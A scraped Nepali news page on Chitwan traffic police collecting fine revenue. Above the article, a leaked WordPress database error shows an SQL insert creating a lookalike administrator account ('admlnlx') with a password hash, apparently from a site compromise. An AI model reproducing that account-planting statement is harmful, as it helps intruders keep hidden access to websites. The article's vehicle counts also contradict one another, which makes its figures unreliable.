WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpjS4BcfmsTW3uLtJGowJ705l6bNxo.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 05:49:14', '', 'admlnlx', 'admlnlx')
चितवन, माघ ३-
जिल्ला ट्राफिक प्रहरी कार्यलय चितवनलेपुस महिनामा करिव २८ लाख वरावर राजश्व संकलन गरेको छ । ट्राफिक नियमहरुको पालना नगर्ने ६ सय ९० वटा साना तथा ठूला सवारी साधनलाई चेकजाँच गरी कारवाही स्वरुप २७ लाख ९४ हजार राजश्व संकलन गरेको जिल्ला ट्राफीक प्रहरी कार्यलय चितवनका प्रहरी जबान विश्व नेपालले जानकारी दिनुभयो ।
सबैभन्दा धेरै ट्रक, कार तथा जिप कारबाहिमा परेका छन् । १ महिनाको अवधीमा ९सय ६० ट्रक तथा ९ सय ५ कार जिप कारबाहिमा परेका छन् । ति सवारीसाधन वाट १२ लाख ९७ हजार ५ सय राजश्व संकलन भएको छ ।त्यस्तै ४ सय ८ बसको कारवाहीबाट ३ लाख २९ हजार १ सय ६८ रुपैया, टेक्टर बाट १ लाख ३८ हजार ५ सय,मोटर साईकल कारवाहीबाट ९ लाख ४२ हजार र अन्य १ सय ३१ वटा सवारीबाट ९५ हजार राजश्व संकलन भएको छ । ट्राफिकको सक्रियताले कारण दुर्घटनामा समेत कमी चितवनका ट्राफिक प्रमुख सन्तोष पन्तले बताउनु भयो ।